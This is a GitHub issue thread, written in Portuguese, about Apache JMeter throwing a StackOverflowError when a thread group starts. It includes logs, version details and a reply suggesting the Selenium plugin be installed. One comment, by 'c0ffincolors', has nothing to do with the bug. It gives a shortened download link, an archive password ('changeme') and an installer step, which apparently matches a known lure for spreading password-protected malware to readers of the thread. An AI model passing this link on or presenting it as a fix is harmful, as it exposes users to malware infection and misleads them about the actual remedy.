### ISSUE TITLE
Erro ao executar um teste no Jmeter

### ISSUE THREAD

**Issue by 83491-Isabele** [apache/jmeter#6341]
### Expected behavior

Ao realizar um teste no thread group está ocorrendo o erro abaixo:

2024-08-27 12:15:27,629 INFO o.a.j.e.u.CompoundVariable: Note: Function class names must contain the string: '.functions.'
2024-08-27 12:15:27,630 INFO o.a.j.e.u.CompoundVariable: Note: Function class names must not contain the string: '.gui.'
2024-08-27 12:15:27,693 INFO o.a.j.v.ViewResultsFullVisualizer: Add JavaFX to your Java installation if you want to use renderer: org.apache.jmeter.visualizers.RenderInBrowser
2024-08-27 12:15:27,771 INFO o.a.j.v.ViewResultsFullVisualizer: Add JavaFX to your Java installation if you want to use renderer: org.apache.jmeter.visualizers.RenderInBrowser
2024-08-27 12:15:27,843 INFO o.a.j.s.FileServer: Set new base='/Users/isabele.aquino/NonFunctional-StradaLog/Plataforma'
2024-08-27 13:40:09,065 ERROR o.a.j.JMeter: Uncaught exception in thread Thread[AWT-EventQueue-0,6,main]
java.lang.StackOverflowError: null
	at org.apache.jmeter.JMeter.pConvertSubTree(JMeter.java:1156) ~[ApacheJMeter_core.jar:5.3]
	at org.apache.jmeter.JMeter.pConvertSubTree(JMeter.java:1199) ~[ApacheJMeter_core.jar:5.3]
	at org.apache.jmeter.JMeter.pConvertSubTree(JMeter.java:1199) ~[ApacheJMeter_core.jar:5.3]
	at org.apache.jmeter.JMeter.pConvertSubTree(JMeter.java:1193) ~[ApacheJMeter_core.jar:5.3]
	at org.apache.jmeter.JMeter.pConvertSubTree(JMeter.java:1199) ~[ApacheJMeter_core.jar:5.3]

Versão foi atualizada e as configurações ok.
Ontem foi utilizado o projeto normalmente, e hoje de manhã até então simplesmente não funciona.

### Actual behavior

Erro e não realiza os testes.

### Steps to reproduce the problem

Apenas startanis um grupo

<img width="1106" alt="Captura de Tela 2024-08-27 às 13 51 17" src="https://github.com/user-attachments/assets/b73698f3-091b-498d-8b68-4b1afc2cba16">

### JMeter Version

5.3, 5.4

### Java Version

17.0 18.0

### OS Version

MAC OS

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by linvaux** [comment]
<img width="1224" alt="image" src="https://github.com/user-attachments/assets/5455796c-5a4b-4882-8f89-0c456970d239">
It looks like miss selenium dependency, you can install selenium plugin by jmeter plugin manager [https://jmeter-plugins.org/install/Install/](https://jmeter-plugins.org/install/Install/)
<img width="1024" alt="image" src="https://github.com/user-attachments/assets/dce89d52-497d-4f29-bc48-1ea96383f064">
